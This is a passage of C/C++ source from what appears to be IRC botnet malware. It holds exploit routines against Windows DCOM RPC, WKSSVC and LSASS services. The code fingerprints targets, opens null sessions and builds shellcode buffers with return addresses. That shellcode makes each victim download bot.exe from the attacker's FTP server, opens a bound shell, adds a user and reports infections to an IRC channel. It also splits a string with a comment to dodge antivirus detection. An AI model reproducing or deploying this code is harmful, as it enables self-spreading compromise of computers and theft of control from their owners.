memcpy(buf2+len1,svcd,sizeof(svcd));
len1=len1+sizeof(svcd);
*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+strlen((const char*)sc)-0xc;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
len=frecv(sockfd, buf1, 1000, 0);
if (fsend(sockfd,buf2,len1,0)== -1)
return FALSE;
fclosesocket(sockfd);
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
{
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
}
return TRUE;
}
bool CScannerDCOM2::Exploit()
{ char szRecvBuf[4096], szSCBuf[4096], szLoadBuf[4096], szReqBuf[4096], szShellBuf[4096], szLoaderBuf[4096];
int iShellSize=0, iLoaderSize=0, iPos=0, iSCSize=0, iLoadSize=0, iReqSize=0;
char *pTemp;
int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
if(iHostOS==OS_UNKNOWN || iHostOS==OS_WINNT) return false;
CString sURL;
if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
else
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
iLoaderSize=encrypt_shellcode(dcom2_loader, sizeof(dcom2_loader), szLoaderBuf, sizeof(szLoaderBuf), NULL);
memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf);
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, dcom2_shellcode_adduser,sizeof(dcom2_shellcode_adduser) );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 );
iLoadSize=iPos; iPos=0;
// Build the request
memcpy(szReqBuf+iPos, dcom2_request1, sizeof(dcom2_request1)-1 ); iPos+=sizeof(dcom2_request1)-1;
memcpy(szReqBuf+iPos, dcom2_request2, sizeof(dcom2_request2)-1 ); iPos+=sizeof(dcom2_request2)-1;
memcpy(szReqBuf+iPos, szLoadBuf, iLoadSize ); iPos+=iLoadSize;
memcpy(szReqBuf+iPos, dcom2_request3, sizeof(dcom2_request3)-1 ); iPos+=sizeof(dcom2_request3)-1;
memcpy(szReqBuf+iPos, dcom2_request4, sizeof(dcom2_request4)-1 ); iPos+=sizeof(dcom2_request4)-1;
iReqSize=iPos; iPos=0;
pTemp=szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12;
char szAssocGroup[4];
// Connect to the server
if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
return false;
// Send the bind string
if(!m_sSocket.Write(dcom2_bindstr, sizeof(dcom2_bindstr)-1))
{ m_sSocket.Disconnect(); return false; }
// Read reply
if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
{ m_sSocket.Disconnect(); return false; }
// Check for DCE_PKT_BINDACK
if(szRecvBuf[2]!=DCE_PKT_BINDACK) { m_sSocket.Disconnect(); return false; }
// Store the association group for later usage
memcpy(szAssocGroup, szRecvBuf+20, 4);
// Send the evil request
if(!m_sSocket.Write(szReqBuf, iReqSize))
{ m_sSocket.Disconnect(); return false; }
// Read reply
if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
{ m_sSocket.Disconnect(); return false; }
// Check for DCE_PKT_FAULT
if(szRecvBuf[2]==DCE_PKT_FAULT) { m_sSocket.Disconnect(); return false; }
// Close the socket that was once funky fresh
m_sSocket.Disconnect(); return true;
}
BOOL dcom(EXINFO exinfo)
{
if (exinfo.port == 445) {
NETRESOURCEW nr;
if (!ConnectViaNullSession(exinfo.ip, &nr))
return FALSE;
else {
char szPipePath[MAX_PATH];
//sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip);//sorry kaspersky
sprintf(szPipePath, "\\\\%s\\", exinfo.ip);
strcat(szPipePath,"pipe\\epmapper");
HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
CloseNullSession(exinfo.ip);
return FALSE;
}
int TargetOS = FpHost(exinfo.ip, FP_PORT5K);
//int TargetOS=FpHost(exinfo.ip,FP_NP);
//if (TargetOS==OS_UNKNOWN)
//TargetOS=FpHost(exinfo.ip,FP_SMB);
//if (TargetOS == OS_WINNT)
//return FALSE;
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE);
if (!reqbuf) {
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
unsigned long lWritten;
char *szInBuf = (char *)malloc(100000);
ZeroMemory(szInBuf,100000);
// send the bind string
DWORD dwRead;
TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
if (szInBuf[2] != 0x0C) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
// send the evil request
if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
free(reqbuf);
free(szInBuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
}
} else { // port 135 and others
int TargetOS=FpHost(exinfo.ip,FP_RPC);
//if (TargetOS==OS_UNKNOWN)
//TargetOS=FpHost(exinfo.ip,FP_SMB);
//if (TargetOS == OS_WINNT)
//return FALSE;
// get a funky fresh socket
SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sSocket == SOCKET_ERROR)
return FALSE;
// fill in sockaddr and resolve the host
SOCKADDR_IN ssin;
ZeroMemory(&ssin,sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE);
if (!reqbuf) {
fclosesocket(sSocket);
return FALSE;
}
// connect to the server
int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
if (iErr == -1) { // connect failed, exit
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// send the bind string
if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
char recvbuf[4096];
frecv(sSocket, recvbuf, 4096, 0);
// Send the evil request
if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
free(reqbuf);
// Close the socket
fclosesocket(sSocket);
}
Sleep(2000);
if (DShell(exinfo))
{
exploit[ exinfo.exploit ].stats++;
}
return TRUE;
}
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo )
{
int TargetOS;
char szShellBuf[ 512 ];
int iShellSize;
// =============================
char* pszTarget;
// ---
char szNetbiosTarget[ 8192 ];
wchar_t wszNetbiosTarget[ 8192 ];
unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ];
unsigned char szExploitsData[ 3500 ];
unsigned long nExploitsDataPos;
wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
// ---
char szIPC[ 8192 ];
NETRESOURCE NetSource;
// ---
char szPipe[ 8192 ];
HANDLE hPipe;
// ---
RPC_ReqBind BindPacket;
unsigned long nBytesWritten;
RPC_ReqNorm ReqNormalHeader;
unsigned long nPacketSize;
unsigned char* pPacket;
unsigned long nPacketPos;
// ============================
// check if xp
TargetOS = FpHost( exinfo.ip, FP_RPC );
if( TargetOS != OS_WINXP )
return FALSE;
// parameters
pszTarget = exinfo.ip;
// get shellcode
iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
if( !iShellSize )
return FALSE;
// generate exploits buffer
// ========================
memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) );
memset( szExploitsData, 0, sizeof( szExploitsData ) );
memset( wszExploitsData, 0, sizeof( wszExploitsData ) );
// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 );
// new EIP
*(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP;
// some NOPs
nExploitsDataPos = 2300;
// add stack
memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
nExploitsDataPos += sizeof( szStack ) - 1;
// add decoder
memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
nExploitsDataPos += sizeof( szDecoder ) - 1;
// add shellcode
// - bind port
// - encode
Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded );
// - add
memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
// - 0 terminaten for decoder
szExploitsData[ nExploitsDataPos ] = 0;
nExploitsDataPos += 1;
// convert to UNICODE
// ==================
for( int n = 0; n < sizeof( szExploitsData ); n++ )
wszExploitsData[ n ] = szExploitsData[ n ];
//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget );
mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) );
// create NULL session
// ===================
if( strcmpi( pszTarget, "." ) )
{
snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget );
memset( &NetSource, 0 ,sizeof( NetSource ) );
NetSource.lpRemoteName = szIPC;
fWNetAddConnection2( &NetSource, "", "", 0 );
}
// ===================
// connect to pipe
// ===============
snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget );
hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
if( hPipe == INVALID_HANDLE_VALUE )
{
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// ===============
// bind packet
// ===========
memset( &BindPacket, 0, sizeof( BindPacket ) );
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11; // bind
BindPacket.NormalHeader.flags = 3; // first + last fragment
BindPacket.NormalHeader.representation = 0x00000010; // little endian
BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 1;
BindPacket.maxtsize = 4280;
BindPacket.maxrsize = 4280;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
BindPacket.Interface1.version = 1;
memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 );
BindPacket.Interface2.version = 2;
memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
// send
if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// ===========
// request
// =======
// generate packet
// ---------------
// calc packet size
nPacketSize = 0;
nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
nPacketSize += 8; // szWSSKVCUnknown3
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += 4; // NetAddAlternateComputerName = reserved
else
nPacketSize += 2; // NetValidateName = NameType
// alloc packet
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
memset( pPacket, 0, nPacketSize );
// build packet
nPacketPos = 0;
// - szWKSSVCUnknown1
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;
// - wszNetbiosTarget
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWKSSVCUnknown2
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
}
// - wszExploitsData
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWSSKVCUnknown3 (only eigth 0x00s)
memset( &pPacket[ nPacketPos ], 0, 8 );
nPacketPos += 8;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
// NetAddAlternateComputerName = 0
*(DWORD*)&pPacket[ nPacketPos ] = 0;
nPacketPos += sizeof( DWORD );
}
else
{
// NetValidateName = NetSetupMachine
*(unsigned short*)&pPacket[ nPacketPos ] = 1;
nPacketPos += 2;
}
// header
memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0; // request
ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 1;
ReqNormalHeader.prescontext = 0;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName
else
ReqNormalHeader.opnum = 25; // NetrValidateName2
// send
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
{
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// =======
// clean up
// =================;
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
char buffer[ IRCLINE ];
//_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
bool CScannerDCOM::Exploit()
{
switch(m_sSocket.m_sPort)
{
case 135:
case 1025:
{
char szRecvBuf[4096]; char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
if(iHostOS==OS_WINNT) return false;
CString sURL;
if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
else
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
// Build a buffer with the shellcode
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0;
// Prepend NOPs as long as shellcode doesn't fit RPC packet format
while(iSCSize%16!=12)
{ char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0; free(szTemp); }
// Set the return address
if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
else
memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);
// Build the request
memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1;
memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1;
memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize;
memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1;
memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1;
iReqSize=iPos;
pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12;
// Connect to the server
if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
return false;
// Send the bind string
if(!m_sSocket.Write(bindstr, sizeof(bindstr)-1)) { m_sSocket.Disconnect(); return false; }
// Read reply
m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000);
// Send the evil request
if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; }
// Read reply
if(!m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) { m_sSocket.Disconnect(); return false; }
// Close the socket that was once funky fresh
m_sSocket.Disconnect(); return true;
}
break;
case 445:
{
#ifdef _WIN32
NETRESOURCEW nr; bool bRetVal=false;
if(!ConnectViaNullSession(m_sSocket.m_szHost, &nr)) return bRetVal;
else
{ int iHostOS=FpHost(m_sSocket.m_szHost, FP_NP);
if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
char szPipePath[MAX_PATH];
sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", m_sSocket.m_szHost);
HANDLE hFile=CreateFile(szPipePath, GENERIC_WRITE|GENERIC_READ, FILE_SHARE_READ, \
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if(hFile!=INVALID_HANDLE_VALUE)
{
SendLocal("%s: connected to pipe \\\\%s\\pipe\\epmapper.", m_sScannerName.CStr(), m_sSocket.m_szHost);
char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
char *pTemp;
CString sURL;
if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
else
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
// Build a buffer with the shellcode
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0;
// Prepend NOPs as long as shellcode doesn't fit RPC packet format
while(iSCSize%16!=12)
{ char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0; free(szTemp); }
// Set the return address
if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
else
memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);
// Build the request
memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1;
memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1;
memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize;
memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1;
memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1;
iReqSize=iPos;
pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12;
unsigned long lWritten; char *szInBuf=(char*)malloc(100000); memset(szInBuf, 0, 100000);
// Send the bind string
DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
if(szInBuf[2]!=0x0C) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
// Send the evil request
if(!WriteFile(hFile, szReqBuf, iReqSize, &lWritten, 0)) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
if(!ReadFile(hFile, szInBuf, 10000, &dwRead, NULL)) bRetVal=true; else bRetVal=false;
free(szInBuf); }
CloseHandle(hFile);
CloseNullSession(m_sSocket.m_szHost); }
return bRetVal;
#endif // _WIN32
}
break;
default:
return false;
break;
}
return false;
}
BOOL lsass445(char *target, void* conn,EXINFO exinfo)
{
IRC* irc=(IRC*)conn;
int len;
SOCKET sockfd;
BOOL bsuccess = FALSE;
char recvbuf[1600];
int iHostOS=FpHost(exinfo.ip, FP_RPC);
if(iHostOS==OS_UNKNOWN)
iHostOS=FpHost(exinfo.ip, FP_SMB);
if(iHostOS==OS_WINNT)
return FALSE;
SOCKADDR_IN their_addr;
ZeroMemory(&their_addr,sizeof(their_addr));
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
their_addr.sin_port = fhtons((unsigned short)exinfo.port);
// connect to the server
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(their_addr)) == SOCKET_ERROR)
return FALSE;
if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1)
{
fclosesocket(sockfd);
return FALSE;
}
if ((len=frecv(sockfd, recvbuf, 1600, 0))==SOCKET_ERROR)
{
fclosesocket(sockfd);
return FALSE;
}
if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1)
{
fclosesocket(sockfd);
return FALSE;
}
if ((len=frecv(sockfd, recvbuf, 1600, 0))==SOCKET_ERROR)
